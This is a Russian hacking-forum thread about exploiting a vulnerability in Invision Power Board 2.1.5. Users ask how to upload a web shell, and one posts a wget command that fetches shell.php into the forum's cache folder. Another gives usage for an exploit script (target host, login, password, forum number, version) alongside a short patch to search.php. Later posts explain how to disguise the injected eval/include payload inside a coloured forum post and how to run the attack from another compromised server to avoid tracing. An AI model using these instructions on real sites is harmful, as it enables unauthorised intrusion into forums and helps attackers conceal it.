Форумы Уязвимость Invision Power Board 2.1.5

вот теперь другая трабла, как шелл залить?

wget http://www.шелл/shell.php -P /cache/

не помогло, показывается html код какойто...
права записи на папки есть

 

Search Message ...[ FAILED ] - chto za poisk soob4enija? ktonibut razbiralsja?

 

tester - читай внимательно эту тему! тут все уже сказали

 

wget не пашет.. Кто залил шелл ?

 

Есть еще и другие качалки GET CURL и тд.

 

Ребят, прекращаем оффтопить. Комманды типа wget, это уже не по сабжу. Смотрим в соответствующем разделе.

 

Полное руководство по применению сплоя ))
Способ применения:
Регимся на сайте
C://ex.pl -h www.host.ru -d forum -l Dark Ne0 -p pass -f 2 -v 2.1.*
-d Указываем директорию где находится форум
-l ваш логин
-p ваш пасс
-f номер форума где экс может создать тему
-v версия форума
Способ защиты:
Заходим sources/search.php(sources/action_public/search.php
Было

{
$this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}

Заменить на

{
$ibforums->input['lastdate'] = intval($ibforums->input['lastdate']);
$this->output = preg_replace( "#(value=[\"']{$ibforums->input['lastdate']}[\"'])#i", "\\1 selected='selected'", $this->output );
}

Патча пока нет ))
Терь уверен все вопросы отпадут

 

Да и помним, что запуская не чищеный сплойт ты отдаешь этот шелл в руки РСТ.

 

Но все равно отследить взломщика по запросу не составит труда !!!
Так что лучше с начала подумать что ломать

 

я так и не понял как убрать шифровку,помогите.
Спасибо!

 

Хых,мой пост на рст,что не узналиDes =Desr0w )))
Видео с использованием данного сплойта:http://forum.antichat.ru/thread18337.html

 

сплойт интересный но пользоваться им в чистом виде не стоит.во первых он инклудит файл с сайта рст и светится у них в логах во вторых он оставляет слишком "паливный" пост.
Если уж кто пользуется им в исходном виде то хотябы сделайте это находим -
$post = "st=0&act=Post
изменяем переменные &TopicTitle=MY_COOL_TOPICK&TopicDesc=MY_COOL_DESC
нахлдим строку
$text = 'r57ipbxp...
дописываем в начале чото типа
$text ='MY_COOL_POST [color=#EFEFEF} r57ipbxplhohohoeval(include(chr(10.........)); //[/color}';
это создаст иллюзиб поста и замаскирует код цвет подбирать под форум (скобки в конце заменить на нормальные)
запускать это дело естественно лучше с какогонить шела а не со своего компа..

 

Grrl,
хех,инклудится чтобы можно было команды передавать через get

 

правда? хм а я думала это для тогочтобы вампиров отпугивать спасибо что просвятил..

 

+ на поднятие настроение поставил

 

Обоснуй plzz

 

Без сплойта больше функциональности.

 

Имеется ввиду ситуация как со сплойтом для пхпбб 2.0.19 на исполнение команд, когда сплойт отсылал логин, пасс админа и урл форума на родной сайт РСТ....

 

+toxa+,ну мля х3.Я не думаю что этим парням это нужно

 

2 Desr0w
Факт остаётся фактом

ССЫЛОЧКА